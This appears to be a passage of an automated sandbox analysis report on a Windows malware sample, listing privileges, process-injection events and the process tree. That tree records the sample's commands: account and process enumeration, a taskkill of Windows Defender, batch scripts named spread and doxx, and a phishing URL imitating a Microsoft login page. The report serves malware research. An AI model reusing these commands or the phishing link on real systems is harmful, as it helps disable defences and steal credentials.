Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-19JVU.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\vir.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 60 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3552 wrote to memory of 1564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 60 wrote to memory of 3528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 3060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 756 wrote to memory of 3364 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 4816 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\xcopy.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 60 wrote to memory of 696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 696 wrote to memory of 3360 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 60 wrote to memory of 5116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 1356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 3428 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 3428 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe
PID 3552 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3552 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 1556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4016 wrote to memory of 1556 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3064 wrote to memory of 5032 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\vir.exe

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\!main.cmd" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K spread.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K doxx.cmd

C:\Windows\SysWOW64\PING.EXE

ping google.com -t -n 1 -s 4 -4

C:\Windows\SysWOW64\xcopy.exe

xcopy 1 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\ipconfig.exe

ipconfig

C:\Windows\SysWOW64\xcopy.exe

xcopy 2 C:\Users\Admin\Desktop

C:\Windows\SysWOW64\net.exe

net accounts

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts

C:\Windows\SysWOW64\xcopy.exe

xcopy 3 C:\Users\Admin\

C:\Windows\SysWOW64\net.exe

net user

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user

C:\Windows\SysWOW64\tasklist.exe

tasklist /apps /v /fo table

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im WindowsDefender.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K handler.cmd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K cipher.cmd

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Rover.exe

Rover.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\web.htm

C:\Users\Admin\AppData\Local\Temp\vir_8a698de5-9d46-42fb-81f0-af6d1d940eb3\Google.exe

Google.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff93f1046f8,0x7ff93f104708,0x7ff93f104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

